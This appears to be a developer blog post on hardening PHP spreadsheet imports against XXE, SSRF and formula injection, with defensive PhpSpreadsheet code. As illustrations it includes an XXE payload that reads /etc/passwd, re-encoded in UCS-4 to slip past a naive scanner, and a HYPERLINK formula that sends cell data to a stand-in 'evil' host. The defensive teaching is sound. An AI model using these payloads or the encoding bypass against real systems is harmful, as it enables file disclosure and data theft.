PHP spreadsheet RCE almost always begins with the most innocent-looking feature in the app: an "Import from Excel" button. I treated XLSX as a passive data format for years until I watched a parser on a client's loan-origination system make an outbound HTTP request to an attacker's server while "reading" an uploaded file. The fix is not complicated, but you have to understand why it happens first. An XLSX file is not a binary blob. It is a ZIP archive full of XML, and the moment your code feeds that XML to a parser, every XML attack class is in play: XXE, server-side request forgery, file disclosure, and on a bad day a chain that ends in remote code execution. Keep PhpSpreadsheet patched, never disable its security scanner, parse with read-data-only, and sanitize cells before export. The rest of this post is the why.

Why is reading an uploaded spreadsheet dangerous at all?

Rename any .xlsx to .zip and unzip it. You get a directory tree of XML parts: xl/workbook.xml, xl/worksheets/sheet1.xml, and a shared-strings table. PhpSpreadsheet (and the abandoned PHPExcel before it) walks that XML with PHP's libxml-backed parsers. The danger is that libxml, left at its defaults on older configurations, will resolve external entities declared in a DOCTYPE. So an attacker uploads a perfectly valid spreadsheet whose sheet1.xml contains an entity that points at file:///etc/passwd or at an internal http:// URL. When the parser expands that entity, your server reads the file or makes the request, then hands the result back inside the parsed data. That is the textbook XML External Entity (XXE) bug, and it is the root of nearly every CVE filed against these libraries.

Figure: Unzip any .xlsx and you are looking at parseable XML, including a DOCTYPE an attacker can weaponize.

XXE, SSRF, and the path to RCE

It helps to separate what XXE can directly do from what it can be chained into. The direct primitives are powerful enough on their own:

  • File read: an external entity pointing at a local path returns file contents into the parsed sheet, leaking config, keys, or /etc/passwd.
  • SSRF: an entity pointing at an internal URL makes the server issue the request, which on cloud hosts can reach the metadata endpoint and hand back temporary credentials.
  • Out-of-band exfiltration: a parameter entity in an external DTD streams stolen data to an attacker-controlled host even when the response is never shown to the user.
  • Deserialization and RCE: if leaked data feeds an unsafe unserialize() path, or SSRF reaches an internal service that executes input, the XXE becomes the first link in a chain that ends in code execution.
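
The last bullet describes the one link in that chain you can cut cheaply in your own code. The following is a minimal sketch, not a complete defense: CacheEntry is a hypothetical stand-in for any class with a magic method, and safeUnserialize() is an illustrative helper name. It relies on the allowed_classes option of unserialize(), which makes PHP return objects as __PHP_Incomplete_Class instead of instantiating them.

```php
<?php

// Hypothetical stand-in for a "gadget": any class whose magic methods
// run automatically when unserialize() rebuilds an object.
final class CacheEntry
{
    public static int $wakeups = 0;

    public function __wakeup(): void
    {
        self::$wakeups++; // a real gadget would do something far worse here
    }
}

/**
 * Decode serialized data without instantiating any class.
 * Objects come back as __PHP_Incomplete_Class, so no magic method runs.
 */
function safeUnserialize(string $payload)
{
    return unserialize($payload, ['allowed_classes' => false]);
}

$payload = serialize(new CacheEntry());

$unsafe = unserialize($payload);     // __wakeup() fires
$safe   = safeUnserialize($payload); // __wakeup() does not fire
```

If the data only ever needs to be arrays and scalars, moving it to JSON removes the object-instantiation question entirely.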

PhpSpreadsheet ships a defense: by default every XML-based reader runs an XmlScanner over each part and throws an exception if it finds a DOCTYPE entity declaration. The uncomfortable history is that this scanner has been bypassed repeatedly. CVE-2024-45293, CVE-2024-47873, and CVE-2024-48917 all defeated the scanner the same way, by getting the charset-detection regex to disagree with what libxml actually decodes. Encode the payload as UTF-7 or UCS-4, or slip whitespace around the encoding= attribute, and the regex sees nothing while the parser cheerfully expands your entity. This is exactly why staying on the latest patched release is the only durable defense; the scanner is a moving target, not a finished wall.
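
To see why a byte-level check and a decoding parser can disagree, here is a small illustration. It is not PhpSpreadsheet's XmlScanner: naiveHasDoctype() and asciiToUcs4Be() are hypothetical helpers written for this post, and the payload is a generic XXE example. The point is only that the same document, re-encoded as UCS-4, no longer contains the literal bytes a pattern match is looking for.

```php
<?php

// Hypothetical naive scanner: searches the raw bytes for "<!DOCTYPE".
// This is NOT the library's scanner, only an illustration of the idea.
function naiveHasDoctype(string $xmlBytes): bool
{
    return stripos($xmlBytes, '<!DOCTYPE') !== false;
}

// Re-encode ASCII text as UCS-4 big-endian: every character becomes
// three zero bytes followed by the original byte.
function asciiToUcs4Be(string $ascii): string
{
    return implode('', array_map(
        static fn (string $char): string => "\0\0\0" . $char,
        str_split($ascii)
    ));
}

$payload = '<?xml version="1.0" encoding="UCS-4"?>'
    . '<!DOCTYPE x [<!ENTITY e SYSTEM "file:///etc/passwd">]>'
    . '<x>&e;</x>';

$plainCaught   = naiveHasDoctype($payload);                // true
$encodedCaught = naiveHasDoctype(asciiToUcs4Be($payload)); // false
```

A parser that honours the declared encoding still sees a DOCTYPE in the second case, which is the gap each of those CVEs exploited in one form or another.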

"An XLSX upload is untrusted XML wearing a business-document costume. Parse it like you would parse anything a stranger handed you."
Md Raihan Hasan

How do I harden the import?

Three layers, in order of importance. First, patch and keep patching, and never call setSecurityScannerEnabled(false) to silence an exception. Second, force the libxml entity loader off yourself rather than trusting any single library version to do it; on PHP 8 the loader defaults to off, but being explicit costs nothing and protects you if a dependency flips it. Third, read with setReadDataOnly(true) so you skip styles and macros you do not need, and run the whole import under a least-privilege OS user and a restricted network egress policy so that even a successful SSRF cannot reach your metadata endpoint.

app/Services/SpreadsheetImporter.php
<?php

namespace App\Services;

use PhpOffice\PhpSpreadsheet\IOFactory;

class SpreadsheetImporter
{
    public function read(string $path): array
    {
        // Belt-and-braces: on PHP 8 the loader is already off, but a
        // dependency can re-enable it. Make our intent explicit.
        if (\PHP_VERSION_ID < 80000 && function_exists('libxml_disable_entity_loader')) {
            libxml_disable_entity_loader(true);
        }
        // Refuse to resolve any external entity, whatever libxml's default is.
        libxml_set_external_entity_loader(static fn () => null);

        // Only trust the extension we expect; do not sniff arbitrary types.
        $reader = IOFactory::createReader('Xlsx');

        // Skip formatting/macros we don't need, and KEEP the scanner on.
        $reader->setReadDataOnly(true);
        $reader->setReadEmptyCells(false);
        // Never do this: $reader->setSecurityScannerEnabled(false);

        $spreadsheet = $reader->load($path); // throws on a DOCTYPE entity

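        // Positional arguments keep this file parseable on PHP 7.4, where the
        // version guard above still matters (named arguments need PHP 8.0).
        return $spreadsheet->getActiveSheet()->toArray(
            null,  // nullValue
            false, // calculateFormulas: do not evaluate untrusted formulas
            false  // formatData
        );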
    }
}

Two details in that snippet matter more than they look. calculateFormulas: false means you never evaluate a formula an attacker wrote, and naming the reader explicitly with createReader('Xlsx') rather than letting IOFactory auto-detect stops a renamed file from being routed to an unexpected reader. The same upload discipline applies to every file feature you have, which I cover in securing file uploads in PHP.
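
A cheap pre-flight check before the file ever reaches a reader fits the same discipline. The sketch below is an assumption-laden example rather than part of PhpSpreadsheet: looksLikeXlsx() is a hypothetical helper, and the 10 MB ceiling is an arbitrary limit chosen for illustration. It only rejects files that are obviously not ZIP archives; it does not prove the contents are safe.

```php
<?php

// Assumed upper bound for an import; pick one that fits your own data.
const MAX_XLSX_BYTES = 10 * 1024 * 1024;

/**
 * Hypothetical pre-flight check: is this a plausibly sized file that
 * starts with the ZIP local-file-header signature?
 */
function looksLikeXlsx(string $path): bool
{
    if (!is_file($path) || !is_readable($path)) {
        return false;
    }

    $size = filesize($path);
    if ($size === false || $size < 4 || $size > MAX_XLSX_BYTES) {
        return false;
    }

    // Read only the first four bytes; a ZIP with entries starts "PK\x03\x04".
    $magic = file_get_contents($path, false, null, 0, 4);

    return $magic === "PK\x03\x04";
}
```

Call it on the uploaded temp file and refuse the request when it returns false, then hand the path to SpreadsheetImporter::read() as before.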

What about formula injection on the way out?

The mirror image of the import problem is CSV or formula injection on export, and it bites you even when your own data is clean. If a user stored a value like =HYPERLINK("http://evil/"&A2,"click") or a cell beginning with +, -, or @, and you write that straight into a CSV or XLSX, the victim's spreadsheet app may execute it on open. That is not your server running code, it is your file weaponizing someone else's machine. The defense is to neutralize any cell whose first character is =, +, -, @, tab, or carriage return by prefixing a single quote so the app treats it as literal text.

app/Support/CellSanitizer.php
<?php

namespace App\Support;

class CellSanitizer
{
    private const DANGEROUS = ['=', '+', '-', '@', "\t", "\r"];

    public static function escape(mixed $value): mixed
    {
        if (!is_string($value) || $value === '') {
            return $value;
        }

        if (in_array($value[0], self::DANGEROUS, true)) {
            // Leading apostrophe forces text mode in Excel/Sheets/LibreOffice.
            return "'" . $value;
        }

        return $value;
    }
}

Run every outbound cell through that before it reaches your writer, and apply it at the boundary so no export path can forget it. This belongs in your standard hardening pass alongside the rest of the Laravel security checklist.
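
One way to apply it at the boundary is to make the writer itself do the escaping, so callers cannot skip it. This is a minimal sketch under stated assumptions: rowsToCsv() is a hypothetical helper, and escapeCell() simply mirrors the logic of CellSanitizer::escape() so the example runs on its own.

```php
<?php

// Mirrors CellSanitizer::escape() so this sketch is self-contained.
function escapeCell($value)
{
    if (!is_string($value) || $value === '') {
        return $value;
    }

    return in_array($value[0], ['=', '+', '-', '@', "\t", "\r"], true)
        ? "'" . $value
        : $value;
}

/**
 * Hypothetical export boundary: every row passes through escapeCell()
 * immediately before it is written.
 *
 * @param iterable<array<int, mixed>> $rows
 */
function rowsToCsv(iterable $rows): string
{
    $stream = fopen('php://memory', 'w+b');

    foreach ($rows as $row) {
        // Explicit delimiter, enclosure, and (empty) escape character.
        fputcsv($stream, array_map('escapeCell', $row), ',', '"', '');
    }

    rewind($stream);
    $csv = stream_get_contents($stream);
    fclose($stream);

    return $csv;
}

$csv = rowsToCsv([
    ['name', 'note'],
    ['Alice', '=HYPERLINK("http://evil/"&A2,"click")'],
    ['Bob', 42],
]);
```

Note the trade-off: a string such as "-5" is also prefixed, so pass genuine numbers as int or float values, which the sanitizer leaves untouched.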

Keeping the dependency honest

Because the protection lives in a library that keeps getting bypassed, your real control is dependency hygiene. Wire composer audit into CI so a newly disclosed PhpSpreadsheet CVE fails the build instead of sitting unnoticed for months.

terminal
# Fails the pipeline on any known advisory in the lock file
composer audit --locked --format=plain

# Pull the patched line; check the changelog for the relevant GHSA fix
composer require phpoffice/phpspreadsheet --update-with-dependencies

If you have never read one of those advisory dumps closely, I walk through the format and how to triage it in how to read and fix a composer audit report. The project's own reading-files documentation covers the XmlScanner behaviour and is worth bookmarking before you touch a reader.

None of this requires exotic tooling. The trap is purely conceptual: we file spreadsheet import under "data plumbing" instead of "untrusted input parsing," and the security scanner lets us believe the library has it handled. It mostly does, until the next regex bypass lands. Treat every uploaded XLSX as hostile XML, parse it read-data-only with the entity loader off and the scanner on, sanitize cells on export, and let composer audit tell you the day your safety net develops a hole. Do that, and the import button stops being the softest target in your app.